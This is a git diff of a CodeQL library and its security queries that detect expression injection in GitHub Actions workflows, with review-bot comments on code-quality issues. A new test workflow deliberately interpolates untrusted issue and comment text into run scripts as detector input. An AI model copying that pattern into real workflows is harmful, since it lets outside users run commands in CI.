@@ -312,17 +441,7 @@ class Needs extends WorkflowNode { Job getANeededJob() { result.getId() = this.asYamlNode().(YamlMappingLikeNode).getNode(_).(YamlString).getValue() and - result.getLocation().getFile() = job.getLocation().getFile() - // if this instanceof YamlString - // then - // result.getId() = this.(YamlString).getValue() and - // result.getLocation().getFile() = job.getLocation().getFile() - // else - // if this instanceof YamlSequence - // then - // result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and - // result.getLocation().getFile() = job.getLocation().getFile() - // else none() + result.getFile() = job.getFile() } } @@ -378,9 +497,9 @@ class Job extends WorkflowNode { */ Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } - StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } + ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } - StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } + ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } /** * Reusable workflow jobs may have Uses children @@ -448,7 +567,7 @@ abstract class Uses extends WorkflowNode { abstract string getVersion(); - abstract StringLiteral getArgument(string key); + abstract ExpressionNode getArgumentExpr(string key); override string toString() { result = "Uses Step" } } 
@@ -482,8 +601,11 @@ class UsesStep extends Step, Uses { /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { result = uses.getValue().regexpCapture(usesParser(), 3) } - override StringLiteral getArgument(string key) { - result.asYamlNode() = this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) + override Expression getArgumentExpr(string key) { + exists(StringValue l | + l.asYamlNode() = this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) and + result = l.getAnExpression() + ) } override string toString() { @@ -535,8 +657,11 @@ class UsesJob extends Uses { ) } - override StringLiteral getArgument(string key) { - this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) = result.asYamlNode() + override ExpressionNode getArgumentExpr(string key) { + exists(StringValue l | + this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) = l.asYamlNode() and + result = l.getAnExpression() + ) } } @@ -545,11 +670,11 @@ class UsesJob extends Uses { * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. */ class Run extends Step { - StringLiteral script; + StringValue script; Run() { this.asYamlMapping().maps(any(YamlString s | s.getValue() = "run"), script.asYamlNode()) } - StringLiteral getScript() { result = script } + StringValue getScript() { result = script } override string toString() { if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" 
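Review bot: `UsesStep.getArgumentExpr` is declared with return type `Expression`, while the abstract declaration in `Uses` (earlier hunk) and the override in `UsesJob` (next hunk) both use `ExpressionNode`. `Expression` is introduced in this commit as an empty subclass of `ExpressionNode`, so the two denote the same values, but the mixed spelling makes this override look narrower than it is. Suggest `override ExpressionNode getArgumentExpr(string key) {` here. The body of `UsesStep` starts before this hunk.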
@@ -559,19 +684,29 @@ class Run extends Step { /** * A YamlString part of a YamlSequence or YamlMapping values. */ -class StringLiteral extends WorkflowNode { - StringLiteral() { +class StringValue extends WorkflowNode { + YamlNode keyNode; + + StringValue() { n instanceof YamlString and exists(YamlCollection c | - c instanceof YamlMapping and - c.(YamlMapping).maps(_, this.asYamlNode()) - or - c instanceof YamlSequence and - c.(YamlSequence).getElementNode(_) = this.asYamlNode() + c = keyNode and + ( + c instanceof YamlMapping and + //c.(YamlMapping).maps(_, this.asYamlNode()) + exists(int i | this.asYamlNode() = c.(YamlMapping).getValueNode(i)) + or + c instanceof YamlSequence and + c.(YamlSequence).getElementNode(_) = this.asYamlNode() + ) ) } string getValue() { result = this.asYamlNode().(YamlString).getValue() } + + YamlNode getKeyNode() { result = keyNode } + + ExpressionNode getAnExpression() { result = this.getAChildNode() } } /** 
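Review bot: The new field `keyNode` in `StringValue` is bound by `c = keyNode` to the enclosing `YamlCollection` (the mapping or sequence that holds the scalar), not to a key, yet `getKeyNode()` is what `expressionOffsets` uses as the column base for block scalars. A doc comment on the accessor would prevent misuse, for example `/** Gets the mapping or sequence that directly contains this string (not its key). */`, or the field and accessor could be renamed to something like `container`. The commented-out `//c.(YamlMapping).maps(_, this.asYamlNode())` line should be deleted rather than committed.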
@@ -580,27 +715,16 @@ class StringLiteral extends WorkflowNode { * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} */ -string getASimpleReferenceExpression(YamlString node) { +string getASimpleReferenceExpression(StringValue node, int offset) { // We use `regexpFind` to obtain *all* matches of `${{...}}`, // not just the last (greedy match) or first (reluctant match). result = node.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, _) - .regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) } -/** - * A StringLiteral containing a workflow expression ${{}}. - */ -class Expression extends StringLiteral { - string expr; - - Expression() { expr = getASimpleReferenceExpression(this.asYamlNode()) } - - string getExpression() { result = expr } - - Job getJob() { result.getAChildNode*() = this } -} +class Expression extends ExpressionNode { } /** * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. @@ -608,15 +732,16 @@ class Expression extends StringLiteral { */ class ContextExpression extends Expression { ContextExpression() { - expr.regexpMatch([ - stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), - matrixCtxRegex() - ]) + expression + .regexpMatch([ + stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), + matrixCtxRegex() + ]) } abstract string getFieldName(); - abstract WorkflowNode getTarget(); + abstract AstNode getTarget(); } private string stepsCtxRegex() { 
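Review bot: In `getASimpleReferenceExpression` the trailing `.regexpCapture("(...)", 1)` wraps the whole pattern in a single group, so it returns exactly the string `regexpFind` already produced and can be dropped. The same pattern is then written a third time in the `ExpressionNode` characteristic predicate (earlier hunk), and two of the three copies carry a stray `(` inside the character class (`\\((\\)`). Holding the pattern in one private predicate would stop the copies from drifting apart. The doc comment above the function lists "alphanumeric characters, underscores, dots, or dashes", but the class also accepts `[`, `]`, `*`, `(` and `)`, so it should be updated. It should also say that a string with no match gets no `ExpressionNode` at all, so anyone reading query results knows that expressions outside this character class are not modelled.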
@@ -654,15 +779,15 @@ class StepsExpression extends ContextExpression { string fieldName; StepsExpression() { - expr.regexpMatch(stepsCtxRegex()) and - stepId = expr.regexpCapture(stepsCtxRegex(), 1) and - fieldName = expr.regexpCapture(stepsCtxRegex(), 2) + expression.regexpMatch(stepsCtxRegex()) and + stepId = expression.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expression.regexpCapture(stepsCtxRegex(), 2) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { - this.getLocation().getFile() = result.getLocation().getFile() and + override AstNode getTarget() { + this.getFile() = result.getFile() and result.(Step).getId() = stepId } } @@ -678,9 +803,9 @@ class NeedsExpression extends ContextExpression { string fieldName; NeedsExpression() { - expr.regexpMatch(needsCtxRegex()) and - neededJobId = expr.regexpCapture(needsCtxRegex(), 1) and - fieldName = expr.regexpCapture(needsCtxRegex(), 2) and + expression.regexpMatch(needsCtxRegex()) and + neededJobId = expression.regexpCapture(needsCtxRegex(), 1) and + fieldName = expression.regexpCapture(needsCtxRegex(), 2) and neededJob.getId() = neededJobId } @@ -688,8 +813,8 @@ class NeedsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { - neededJob.getLocation().getFile() = this.getLocation().getFile() and + override AstNode getTarget() { + neededJob.getFile() = this.getFile() and this.getJob().getANeededJob() = neededJob and ( // regular jobs 
@@ -711,17 +836,17 @@ class JobsExpression extends ContextExpression { string fieldName; JobsExpression() { - expr.regexpMatch(jobsCtxRegex()) and - jobId = expr.regexpCapture(jobsCtxRegex(), 1) and - fieldName = expr.regexpCapture(jobsCtxRegex(), 2) + expression.regexpMatch(jobsCtxRegex()) and + jobId = expression.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expression.regexpCapture(jobsCtxRegex(), 2) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { + override AstNode getTarget() { exists(Job job | job.getId() = jobId and - job.getLocation().getFile() = this.getLocation().getFile() and + job.getFile() = this.getFile() and job.getOutputs() = result ) } @@ -736,14 +861,14 @@ class InputsExpression extends ContextExpression { string fieldName; InputsExpression() { - expr.regexpMatch(inputsCtxRegex()) and - fieldName = expr.regexpCapture(inputsCtxRegex(), 1) + expression.regexpMatch(inputsCtxRegex()) and + fieldName = expression.regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { - result.getLocation().getFile() = this.getLocation().getFile() and + override AstNode getTarget() { + result.getFile() = this.getFile() and ( exists(ReusableWorkflow w | w.getInput(fieldName) = result) or @@ -761,15 +886,15 @@ class EnvExpression extends ContextExpression { string fieldName; EnvExpression() { - expr.regexpMatch(envCtxRegex()) and - fieldName = expr.regexpCapture(envCtxRegex(), 1) + expression.regexpMatch(envCtxRegex()) and + fieldName = expression.regexpCapture(envCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { + override AstNode getTarget() { exists(WorkflowNode s | - s.getEnvVar(fieldName) = result and + s.getInScopeEnvVarExpr(fieldName) = result and s.getAChildNode*() = this ) } 
@@ -784,13 +909,13 @@ class MatrixExpression extends ContextExpression { string fieldName; MatrixExpression() { - expr.regexpMatch(matrixCtxRegex()) and - fieldName = expr.regexpCapture(matrixCtxRegex(), 1) + expression.regexpMatch(matrixCtxRegex()) and + fieldName = expression.regexpCapture(matrixCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { + override AstNode getTarget() { exists(Workflow w | w.getStrategy().getMatrixVar(fieldName) = result and w.getAChildNode*() = this diff --git a/ql/lib/codeql/actions/ast/internal/Yaml.qll b/ql/lib/codeql/actions/ast/internal/Yaml.qll index 402ceae44ce..49b83df48db 100644 --- a/ql/lib/codeql/actions/ast/internal/Yaml.qll +++ b/ql/lib/codeql/actions/ast/internal/Yaml.qll @@ -11,7 +11,14 @@ private module YamlSig implements LibYaml::InputSig { import codeql.Locations class LocatableBase extends @yaml_locatable { - Location getLocation() { yaml_locations(this, result) } + Location getLocation() { + exists(@location_default loc, File f, string p, int sl, int sc, int el, int ec | + f.getAbsolutePath() = p and + locations_default(loc, f, sl, sc, el, ec) and + yaml_locations(this, loc) and + result = TBaseLocation(p, sl, sc, el, ec) + ) + } string toString() { none() } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 6015e6336ca..0972ae50039 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -80,7 +80,7 @@ module Completion { } module CfgScope { - abstract class CfgScope extends AstNode { } + abstract class CfgScope extends WorkflowNode { } class WorkflowScope extends CfgScope instanceof Workflow { } 
@@ -148,7 +148,7 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos rank[i](AstNode child, Location l | ( child = this.(CompositeAction).getAnInput() or - child = this.(CompositeAction).getAnOutput() or + child = this.(CompositeAction).getAnOutputExpr() or child = this.(CompositeAction).getRuns() ) and l = child.getLocation() @@ -172,7 +172,7 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { rank[i](AstNode child, Location l | ( child = this.(ReusableWorkflow).getAnInput() or - child = this.(ReusableWorkflow).getAnOutput() or + child = this.(ReusableWorkflow).getAnOutputExpr() or child = this.(ReusableWorkflow).getStrategy() or child = this.(ReusableWorkflow).getAJob() ) and @@ -202,7 +202,7 @@ private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getOutput(_) and l = child.getLocation() + child = super.getOutputExpr(_) and l = child.getLocation() | child order by @@ -247,7 +247,7 @@ private class UsesTree extends StandardPreOrderTree instanceof Uses { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getArgument(_) or child = super.getEnvVar(_)) and + (child = super.getArgumentExpr(_) or child = super.getInScopeEnvVarExpr(_)) and l = child.getLocation() | child @@ -261,7 +261,7 @@ private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getEnvVar(_) or child = super.getScript()) and + (child = super.getInScopeEnvVarExpr(_) or child = super.getScript()) and l = child.getLocation() | child 
@@ -271,8 +271,21 @@ private class RunTree extends StandardPreOrderTree instanceof Run { } } +private class StringValueTree extends StandardPreOrderTree instanceof StringValue { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](ExpressionNode child, int sl, int el, int sc, int ec, string path | + child = super.getAChildNode() and child.hasLocationInfo(path, sl, sc, el, ec) + | + child order by sl, sc, ec, el, child.toString() + ) + } +} + private class UsesLeaf extends LeafTree instanceof Uses { } private class InputTree extends LeafTree instanceof Input { } -private class StringLiteralLeaf extends LeafTree instanceof StringLiteral { } +private class StringValueLeaf extends LeafTree instanceof StringValue { } + +private class ExpressionLeaf extends LeafTree instanceof ExpressionNode { } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index c427f8b828a..008b5a19ce6 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -52,7 +52,7 @@ predicate externallyDefinedSource( ) and ( if fieldName.trim().matches("env.%") - then source.asExpr() = uses.getEnvVar(fieldName.trim().replaceAll("env.", "")) + then source.asExpr() = uses.getInScopeEnvVarExpr(fieldName.trim().replaceAll("env.", "")) else if fieldName.trim().matches("output.%") then source.asExpr() = uses @@ -76,10 +76,10 @@ predicate externallyDefinedStoreStep( ) and ( if input.trim().matches("env.%") - then pred.asExpr() = uses.getEnvVar(input.trim().replaceAll("env.", "")) + then pred.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) else if input.trim().matches("input.%") - then pred.asExpr() = uses.getArgument(input.trim().replaceAll("input.", "")) + then pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) else none() ) and succ.asExpr() = uses 
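Review bot: After this hunk `StringValue` is covered by two CFG tree classes at once: the new `StringValueTree extends StandardPreOrderTree` gives it expression children, while `StringValueLeaf extends LeafTree` (the renamed `StringLiteralLeaf`) still declares it a leaf. That looks like a leftover from the rename. Unless the shared CFG library is known to tolerate both shapes for one node, drop `private class StringValueLeaf extends LeafTree instanceof StringValue { }` so that a string's expressions are reached only through `StringValueTree`. A one-line doc comment on `StringValueTree` saying that the expressions of a string are visited in source order (start line, then start column) would also document the `order by` clause.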
@@ -90,10 +90,10 @@ predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { exists(Uses uses, string action, string version, string input | ( if input.trim().matches("env.%") - then sink.asExpr() = uses.getEnvVar(input.trim().replaceAll("env.", "")) + then sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) else if input.trim().matches("input.%") - then sink.asExpr() = uses.getArgument(input.trim().replaceAll("input.", "")) + then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) else none() ) and sinkModel(action, version, input, kind) and diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 0dea91af2b9..7cfde2a6f9f 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -36,7 +36,7 @@ class AdditionalTaintStep extends Unit { predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run r, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and - r.getEnvVar(varName) = pred.asExpr() and + r.getInScopeEnvVarExpr(varName) = pred.asExpr() and exists(string script, string line | script = r.getScript().getValue() and line = script.splitAt("\n") and diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 57ef4743487..65e2abaa6c6 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
@@ -72,8 +72,7 @@ class DataFlowCall instanceof Cfg::Node { /** Gets a textual representation of this element. */ string toString() { result = super.toString() } - Location getLocation() { result = super.getLocation() } - + //Location getLocation() { result = super.getLocation() } string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } @@ -85,8 +84,7 @@ class DataFlowCall instanceof Cfg::Node { class DataFlowCallable instanceof Cfg::CfgScope { string toString() { result = super.toString() } - Location getLocation() { result = super.getLocation() } - + //Location getLocation() { result = super.getLocation() } string getName() { if this instanceof ReusableWorkflow then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() @@ -162,7 +160,7 @@ class ParameterPosition extends string { * Made a string to match `With:` keys in the AST */ class ArgumentPosition extends string { - ArgumentPosition() { exists(any(Uses e).getArgument(this)) } + ArgumentPosition() { exists(any(Uses e).getArgumentExpr(this)) } } /** @@ -232,7 +230,7 @@ predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ env.foo }} */ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, EnvExpression astTo | + exists(AstNode astFrom, EnvExpression astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( @@ -301,7 +299,7 @@ predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node */ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { exists(Outputs out, string fieldName | - node1.asExpr() = out.getOutput(fieldName) and + node1.asExpr() = out.getOutputExpr(fieldName) and node2.asExpr() = out and c = any(FieldContent ct | ct.getName() = fieldName) ) 
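Review bot: Both `getLocation()` members are disabled by commenting them out (`//Location getLocation() { result = super.getLocation() }`), in `DataFlowCall` and, in the next hunk, `DataFlowCallable`, with no reason recorded. Because these classes are declared with `instanceof`, the member is presumably not inherited from `Cfg::Node` / `Cfg::CfgScope`, so code that asks a call or callable for its location would no longer resolve. Either delete the lines or replace them with a comment that states why, for example `// getLocation() omitted: <reason>`.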
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 3a21005e29b..dbae273151b 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -78,12 +78,12 @@ class CallNode extends ExprNode { * An argument to a Uses step (call). */ class ArgumentNode extends ExprNode { - ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgument(_) } + ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgumentExpr(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = - any(Uses e | e.getArgument(pos) = this.getCfgNode().getAstNode()) + any(Uses e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) } } diff --git a/ql/lib/ext/PLACEHOLDER.model.yml b/ql/lib/ext/actions_github-script.model.yml similarity index 57% rename from ql/lib/ext/PLACEHOLDER.model.yml rename to ql/lib/ext/actions_github-script.model.yml index 2f549573a53..df5b1f70ae5 100644 --- a/ql/lib/ext/PLACEHOLDER.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -3,5 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["","","",""] + - ["actions/github-script","*","input.script","expression-injection"] + + diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index ac829c2395e..096c19b48d0 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql 
@@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript() = this.asExpr()) or + exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 02e17b76ac5..0edeb0a7ec8 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getAnOutput() = sink.asExpr()) + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index 7ca86560998..59a05f64b6c 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getAnOutput() = sink.asExpr()) + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index fd4350efae8..040251045c8 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql 
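Review bot: The private `ExpressionInjectionSink` class gets the identical one-line change here and in ReusableWorkflowsSinks.ql, CriticalExpressionInjection.ql and ExpressionInjection.ql. The sink definition for one vulnerability class therefore lives in four copies that can drift apart. Moving the class to a shared library file and importing it in the four queries keeps their coverage the same when the sink definition changes again. A short QLDoc on the class, saying that the sink is each expression embedded in a `run` script or an externally modelled `expression-injection` sink, would also document the narrowing from the whole script to `getAnExpression()`.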
@@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript() = this.asExpr()) or + exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index 7b0f3159357..6e88f36fece 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getAnOutput() = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 699c5b2b5dc..4f710a16e8f 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getAnOutput() = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 1f7797b8a0a..590660ce63b 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql 
@@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript() = this.asExpr()) or + exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -43,4 +43,5 @@ where .getEnclosingWorkflow() .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, - "Potential expression injection, which may be controlled by an external user." + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(ExpressionNode).getExpression() diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 0bf4e858db2..0d0bb39c41e 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript() = this.asExpr()) or + exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -37,4 +37,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection, which may be controlled by an external user." + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(ExpressionNode).getRawExpression() diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 2e3dc7049bd..db341e0c5cc 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql 
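Review bot: The two alert messages label the `$@` link differently: CriticalExpressionInjection.ql uses `.getExpression()` and ExpressionInjection.ql (last hunk on this line) uses `.getRawExpression()`, so the same sink is described with different text depending on the query. The inline cast `.(ExpressionNode)` in the `select` also acts as a filter. A sink reported through `externallyDefinedSink` whose `asExpr()` is not an `ExpressionNode` would drop out of the results without notice; whether that can happen depends on `getArgumentExpr`, which is not shown. Use one accessor in both queries, for example `sink.getNode().asExpr().(ExpressionNode).getRawExpression()`, and move the type test into the `where` clause or the sink class so the restriction is explicit.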
@@ -39,8 +39,7 @@ where job.getAStep() = checkoutStep and checkoutStep.getCallee() = "actions/checkout" and checkoutStep - .getArgument("ref") - .(Expression) + .getArgumentExpr("ref") .getExpression() .matches([ "%github.event.pull_request.head.ref%", "%github.event.pull_request.head.sha%", diff --git a/ql/test/library-tests/.github/workflows/expression_nodes.yml b/ql/test/library-tests/.github/workflows/expression_nodes.yml new file mode 100644 index 00000000000..1d40cabdd6a --- /dev/null +++ b/ql/test/library-tests/.github/workflows/expression_nodes.yml @@ -0,0 +1,22 @@ +on: issue_comment + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: LINE 1echo '${{ github.event.comment.body }}' + - run: | + LINE 1 echo '${{ github.event.comment.body }}' + - run: | + LINE 1 echo '${{ github.event.comment.body }}' + LINE 2 echo '${{github.event.issue.body}}' + - run: > + LINE 1 echo '${{ github.event.comment.body }}' + echo '${{github.event.issue.body}}' + - run: | + LINE 1 echo '${{ github.event.comment.body }}' + LINE 2 echo '${{github.event.issue.body}}' + LINE 3 echo '${{ github.event.comment.body }}' + - run: "LINE 1 echo '${{ github.event.comment.body }}' + echo '${{github.event.issue.body}}'" + diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 4d290a90604..ca481768671 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
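Review bot: The expected output added for this fixture later in the patch records expression locations that look one column too far right and, for folded and quoted scalars, no per-expression position at all. For the first step the scalar is `7:14:7:58` and its `${{ }}` starts at column 26, yet the expression node is `7:27:7:58`; in test.yml the node `8:20:8:50` ends past its enclosing scalar `8:19:8:49`. For the `>` and double-quoted multi-line steps both expressions get the whole scalar span (`14:9:15:46`, `20:14:21:46`), so two alerts in one script point at the same place. Accepting these rows fixes the behaviour in the test. Correct the offset in the location logic (not shown here) first, or record the fallback as a known limitation next to the test.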
